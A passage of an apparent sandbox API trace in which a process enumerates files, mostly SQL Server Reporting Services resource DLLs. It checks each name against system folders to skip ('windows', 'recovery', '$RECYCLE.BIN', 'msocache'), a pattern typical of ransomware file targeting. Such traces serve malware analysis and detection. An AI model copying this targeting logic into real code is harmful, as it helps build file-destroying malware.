lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0126.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.527] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf10a1263, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf12b7378, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x71078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0126.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0126.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d728, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0126.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d578, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23fa98 [0126.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244708 | out: hHeap=0x1e0000) returned 1 [0126.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.527] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6165f55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6165f55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14ad8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MI5C38~1.DLL")) returned 1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.527] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0126.528] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0126.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0126.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d698, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0126.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0126.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d728, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0126.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0126.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0126.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.528] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf12dd5ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf13037fa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xaad8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.528] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0126.528] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0126.528] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0126.528] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0126.528] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0126.528] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0126.528] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0126.528] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.528] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0126.528] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0126.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0126.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0126.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0126.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0126.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.529] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf19de457, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf19de457, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf19de457, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3e88, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.529] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0126.529] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0126.529] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0126.529] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0126.529] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0126.529] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0126.529] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0126.529] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.529] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0126.529] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0126.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0126.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d578, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0126.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dcb0 [0126.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0126.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.533] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2ff666, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2ff666, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2ff666, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0126.533] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0126.533] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0126.533] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0126.533] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0126.533] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0126.533] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0126.533] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0126.533] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.533] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0126.533] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0126.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0126.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0126.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0126.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0126.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0126.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.533] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9c75fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9c75fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa39cfa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e68, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.533] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0126.533] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0126.533] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0126.533] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0126.533] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0126.533] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0126.534] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0126.534] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.534] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0126.534] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0126.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0126.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0126.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0126.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0126.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0126.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.534] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9c75fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9c75fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa39cfa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e68, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.534] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0126.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0126.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0126.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0126.534] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0126.534] lstrcmpiW (lpString1="fi", lpString2=".") returned 1 [0126.534] lstrcmpiW (lpString1="fi", lpString2="..") returned 1 [0126.534] lstrcmpiW (lpString1="fi", lpString2="...") returned 1 [0126.534] lstrcmpiW (lpString1="fi", lpString2="windows") returned -1 [0126.534] lstrcmpiW (lpString1="fi", 